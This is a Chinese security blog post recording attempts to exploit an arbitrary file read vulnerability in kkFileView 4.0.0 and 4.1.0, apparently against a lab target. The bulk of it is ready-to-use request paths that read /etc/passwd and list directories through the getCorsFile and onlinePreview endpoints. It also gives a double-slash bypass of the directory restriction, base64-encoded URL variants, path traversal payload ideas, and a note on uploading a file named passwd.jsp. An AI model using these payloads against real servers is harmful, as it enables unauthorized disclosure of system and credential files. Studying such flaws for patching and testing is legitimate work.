kkFileView任意读取漏洞思考

最新推荐文章于 2024-05-23 10:50:01 发布
最新推荐文章于 2024-05-23 10:50:01 发布
阅读量3.3k 收藏 2
点赞数 1
文章标签: linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35013491/article/details/130394800
版权

一:记录最近遇到的问题。

目标靶机服务器存在kkFileView 版本为4.0.0版本

历史版本存在任意文件读取漏洞:

/file-preview/getCorsFile?urlPath=file:///etc/passwd

/getCorsFile?urlPath=file:///etc/passwd

/file-preview/onlinePreview?url=ZmlsZTovLy91dGMvcGFzc3dkI2EudHhO (filie:///etc/passwd)

/onlinePreview?url=ZmlsZTovLy91dGMvcGFzc3dkI2EudHhO (filie:///etc/passwd)

二:突破

低版本的/file-preview/getCorsFile?urlPath=file:///etc/passwd直接可以读文件和

列目录/file-preview/getCorsFile?urlPath=file:///

遇到的版本 

/file-preview/getCorsFile?urlPath=file:///etc/passwd  提示限制目录预览。

后面突破:

/file-preview//getCorsFile?urlPath=file:///etc/passwd   成功读取到内容,

/file-preview//getCorsFile?urlPath=file:/// 也能成功列目录

三:延伸

今天又遇到个4.1.0 版本 也提示提示限制目录运行。

路径加一个斜杠/,成功突破目录限制预览,但是暴500错误,

file:///etc/passwd 也是 500

base64也是 500。 

应该目录限制是突破了,这个500错误暂时不清楚情况。

好像全站不支持脚本运行,附件上传默认上传到tmp目录,可以上传/etc/passwd.jsp 然后预览会在 tmp上级目录上传一个passwd.jsp,但是继续跳转目录不能成功。

思路3:/file-preview/getCorsFile?urlPath=file:///etc/passwd

思路4:/file-preview//getCorsFile?urlPath=file:///etc/passwd  //突破限制目录

思路5:/file-preview//onlinePreview?url=ZmlsZTovLy91dGMvcGFzc3dkI2EudHhO  //base64

思路6:/file-preview//onlinePreview?url=..<details>/..<details>/..<details>etc/passwd 

.思路7:..|/..|/..|/..|/..|/..|/..|/..|etc/passwd

思路8:/file-preview//onlinePreview?url=file:///etc/passwd#a.txt

低调求绕过,没事写博客
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Adminer≤4.6.2任意文件读取漏洞1
08-03
Adminer≤4.6.2 任意读取漏洞0x01 前SQLite、PostgreSQL 等众多主流数据库,类似于 phpMyAdmin 的 MySQL 管理客
kkFileview存在任意文件读取漏洞
nnn2188185的博客
04-26 7802
Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。
KKFileView v3.5.1文件预览服务漏洞修复
最新发布
fengshi95的博客
05-23 384
KKFileView演示首页,提供了文件上传的功能,可以上传任意文件。
kkFileView漏洞总结
Websec
03-18 2554
Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。kkFileview v4.1.0存在SSRF漏洞,攻击者可以利用此漏洞造成服务器端请求伪造(SSRF),远程攻击者可以通过将任意url注入url参数来强制应用程序发出任意请求,从而获取内网机器的数据。3、kkFileview的onlinePreview接口也存在SSRF漏洞,但是利用条件上稍微有点区别,这个接口限制了后缀只能为一些常见的文本类型。
文件包含漏洞小总结
Bu2n的博客
01-10 1620
文件包含漏洞产生漏洞函数类型本地文件包含(LFI)利用远程文件包含(RFI)前提利用其他伪协议包含利用绕过技术黑名单绕过后缀限制绕过%00截断url远程文件包含绕过方法一方法二 文件包含漏洞 由于开发人员编写源码,将可重复使用的代码插入到单个的文件中,并在需要的时候将它们包含在特殊的功能代码文件中,然后包含文件中的代码会被解释执行。有时候网站功能需求,会让用户选择要包含的文件,以达到某种功能,但是开发者并没有对要包含的文件进行安全检查,导致攻击者可以任意修改包含的文件,甚至是服务器上的一些敏感文件,导致.
kkFileView getCorsFile 任意文件读取漏洞(CVE-2021-43734)
weixin_44304678的博客
11-09 1472
Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件。
Docker安装kkfileviewkkfileview在docker部署后预览出现预览中的字体样式与源文件不同的解决办法,动态水印 kkfileview漏洞修复
chenthe1的专栏
06-21 4598
Docker容器环境环境运行 漏洞修复 拉取镜像docker pull keking/kkfileview 原运行方式: docker run -it -p 8012:8012 keking/kkfileview一般容器里面的 Linux是精简版的,没有 less 、cat 、vim/vi 等命令,如果需要的话可以自己安装,默认自带 APT 命令。 APT安装vim,先进入需要安装的容器(docker exec -it 容器标识 bash ),再执行如下命令:
网络安全-kkFileViews任意文件读取漏洞原理解析
weixin_39445116的博客
02-04 2111
在学习的过程中,了解到kkFileView存在任意文件读取、SSRF、文件上传漏洞。为了更深刻的理解其原理,我从git拉取了项目,由于该漏洞在最新版本已经修复,所以这只是历史版本中存在的。写这篇文章来提醒自己代码中容易出问题的地方。
kkFileView远程代码执行漏洞分析
qq_18193739的博客
04-23 1737
使用…/…/ 即可导致任意文件内容覆盖转换pdf是启动了LibreOffile 并执行 C:\Users\26927\Downloads\kkFileView-4.2.1\server\libreoffice\program\uno.py 脚本中内容导致RCE。
kkfileview踩坑记录-清缓存+删除本地下载的文件
qq_39306234的博客
04-11 3911
kkfileview根据文件名删除缓存以及本地文件,文件重名问题解决
kkfileview阿里云安全扫描:威胁类型敏感信息回显 (Sensitive Information Response)
weixin_43866043的博客
03-30 1857
kkfileview
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
nc57-任意文件读取漏洞补丁
06-08
【标题】"nc57-任意文件读取漏洞补丁" 涉及的是一个针对NC57软件的安全问题,该补丁旨在修复一个可能导致任意文件读取漏洞。在网络安全领域,这样的漏洞通常是非常严重的问题,因为它允许攻击者未经授权访问系统上...
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。
74cms v4.2.X任意文件读取漏洞
09-06
**74cms v4.2.X任意文件读取漏洞详解** 在网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全问题,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者通过特定的手段读取服务器上...
kkFileView代码分析(二)——文件控制分析
m0_55503427的博客
10-17 1462
2021SC@SDUSC
kkFileview任意文件读取漏洞复现
qq_44484541的博客
11-01 1695
kkFileView为文件文档在线预览解决方案,该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览,如doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip,rar,图片,视频,音频等等。Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。
漏洞分析 | kkFileView远程代码执行漏洞
WangsuSecurity的博客
05-17 1200
网宿安全演武实验室监测到kkFileView存在远程代码执行漏洞(网宿评分:危急,CVSS3.1评分:9.8)
kkFileView 任意文件上传致远程代码执行漏洞复现(QVD-2024-14703)
0xSec
04-21 1808
2024年4月,互联网上披露kkFileView远程代码执行漏洞情报,攻击者可利用该漏洞上传恶意文件,获取操作系统权限。该漏洞利用简单,建议受影响的客户尽快修复漏洞
kkFileView任意读取漏洞
09-19
kkFileView存在任意文件读取漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。该漏洞可以通过构造特定的数据包来触发,攻击者可以通过利用此漏洞来获取系统上的敏感文件信息。 补丁获取链接:https://github.com/kekingcn/kkFileView/issues/304

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值